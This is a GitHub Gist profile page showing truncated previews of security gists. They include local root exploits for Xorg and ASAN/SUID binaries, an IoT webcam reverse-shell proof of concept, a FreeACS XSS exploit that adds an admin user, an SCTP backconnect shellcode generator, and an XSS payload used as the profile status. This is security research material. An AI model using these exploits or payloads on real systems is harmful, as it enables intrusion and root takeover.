Skip to content

Instantly share code, notes, and snippets.

Avatar
💭
'"/><script>alert(0)</script>

David Davidson 0x27

💭
'"/><script>alert(0)</script>
View GitHub Profile
View seeya.sh
#!/usr/bin/env bash
# SEE YOU SPACE COWBOY by DANIEL REHN (danielrehn.com)
# Displays a timeless message in your terminal with cosmic color effects
# Usage: add "sh ~/seeyouspacecowboy.sh; sleep 2" to .bash_logout (or similar) in your home directory
# (adjust the sleep variable to display the message for more seconds)
# Cosmic color sequence
View hangup_user.sh
#!/bin/bash
echo "SSH hangup user tool. For killing other users connections."
if [ $# -eq 0 ]
then
echo "use: $0 <PTS number to kill>"
exit
fi
echo "Terminating PTS/$1"
OWNER=$(stat -c '%U' /dev/pts/$i)
SSH_PID=$(pgrep -a sshd | grep pts/$1 | cut -d ' ' -f 1)
View x0rg.sh
#!/bin/bash
# x0rg - Xorg Local Root Exploit
# Released under the Snitches Get Stitches Public Licence.
# props to prdelka / fantastic for the shadow vector.
# Gr33tz to everyone in #lizardhq and elsewhere <3
# ~infodox (25/10/2018)
# FREE LAURI LOVE!
echo "x0rg"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
View eurovision.py
#!/usr/bin/python2
# coding: utf-8
# implements: https://twitter.com/twisteddoodles/status/863474505808846848
# we import some random
import random
# first, we create our arrays, and pick random words from them and store.
a = random.choice(["cat", "horse", "seagull", "dolphin", "fire engine"])
b = random.choice(["escape", "make love to", "smother", "dance with"])
c = random.choice(["drumkit", "firework", "toilet", "seagull", "bag"])
d = random.choice(["disco", "airport", "changing room", "tumble dryer"])
@0x27
0x27 / upwned247.php
Created May 5, 2017 — forked from Wack0/upwned247.php
UCam247/Phylink/Titathink/YCam/Anbash/Trivision/Netvision/others IoT webcams : remote code exec: reverse shell PoC. (works only in qemu usermode)
View upwned247.php
<?php
/*
Updated version, 2016-12-02: fixed shellcode so it *actually* works on QEMU
usermode emulation (seems I pushed an old version), and removed debug output.
-------------------------
NB: THIS PoC ONLY WORKS IN QEMU USERMODE EMULATION!
If anyone wants to fix this, go ahead (no pun intended).
However, I don't have a vulnerable product and am unwilling to acquire one.
@0x27
0x27 / freeacs-pwn.py
Created Apr 7, 2017
FreeACS Remote Takeover 0day (Persistent XSS via CWMP NOTIFY -> Add Admin User
View freeacs-pwn.py
#!/usr/bin/python
# worlds cheapest exploit - made by copypasting from stackoverflow.
# released at BSides Edinburgh.
# Exploits freeacs - freeacs.com
# TL;DR:
# - Persistent XSS via CWMP Notify message
# - XSS fires in admin session and adds a user
# HACK THE PLANET!
# Darren Martyn - @info_dox - 7th March 2017
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
@0x27
0x27 / opera-vpn.md
Created Jan 19, 2017 — forked from spaze/opera-vpn.md
Opera VPN behind the curtains is just a proxy, here's how it works
View opera-vpn.md

When setting up (that's immediately when user enables it in settings) Opera VPN sends few API requests to https://api.surfeasy.com to obtain credentials and proxy IPs, see below, also see The Oprah Proxy.

The browser then talks to a proxy de0.opera-proxy.net (when VPN location is set to Germany), it's IP address can only be resolved from within Opera when VPN is on, it's 185.108.219.42 (or similar, see below). It's an HTTP/S proxy which requires auth.

When loading a page with Opera VPN enabled, the browser sends a lot of requests to de0.opera-proxy.net with Proxy-Authorization request header.

The Proxy-Authorization header decoded: CC68FE24C34B5B2414FB1DC116342EADA7D5C46B:9B9BE3FAE674A33D1820315F4CC94372926C8210B6AEC0B662EC7CAD611D86A3 (that's sha1(device_id):device_password, where device_id and device_password come from the POST /v2/register_device API call, please note that this decoded header is from another Opera installation and thus contains

View VtScanTarPreview.md

Preview of vtscantar (which is going to be re-integrated into hfsdown). Only alerts on the files in the tar that are flagged by VirusTotal.

hack@theplanet:~/vtscantar$ python vtscantar.py ~/hfsdown/output/mirror-118.193.176.22.tar 
Scanning: /home/hack/hfsdown/output/mirror-118.193.176.22.tar
Infected File: DANDNA.apk -> SHA256sum: 72a0745d835d15a707580e3df36396fb2598d61314bb740772a36150d682ea12 -> VirusTotal: 22/55
Infected File: svchost.exe -> SHA256sum: 640525b3d664fe8ae8c861276c15dfec60f6f19db26669dcf28b13620cfced9d -> VirusTotal: 38/53
Infected File: ���22_sign.apk -> SHA256sum: 23f6e9b5e5ba85621d8b7403390825aa767ff6da28132e025844fba1e1ef47f2 -> VirusTotal: 21/54
Infected File: ���˽�_sign.apk -> SHA256sum: 37b02bbfec667862b4f6adcc0429d46e93e7a159244d6ffbf2af27d035d903f5 -> VirusTotal: 22/54
View unsanitary.sh
#!/bin/bash
# unsanitary.sh - ASAN/SUID Local Root Exploit
# Exploits er, unsanitized env var passing in ASAN
# which leads to file clobbering as root when executing
# setuid root binaries compiled with ASAN.
# Uses an overwrite of /etc/ld.so.preload to get root on
# a vulnerable system. Supply your own target binary to
# use for exploitation.
# Implements the bug found here: http://seclists.org/oss-sec/2016/q1/363
# Video of Exploitation: https://www.youtube.com/watch?v=jhSIm3auQMk
View elfgen-sctp.py
#!/usr/bin/python2
# coding: utf-8
# sctp backconnect elf generator v1.0
import socket
import struct
import sys
def make_shellcode(cb_host, cb_port):
sc = "7f454c4602010100000000000000000002003e00010000007800400000000000"
sc += "400000000000000000000000000000000000000040003800010000000000000"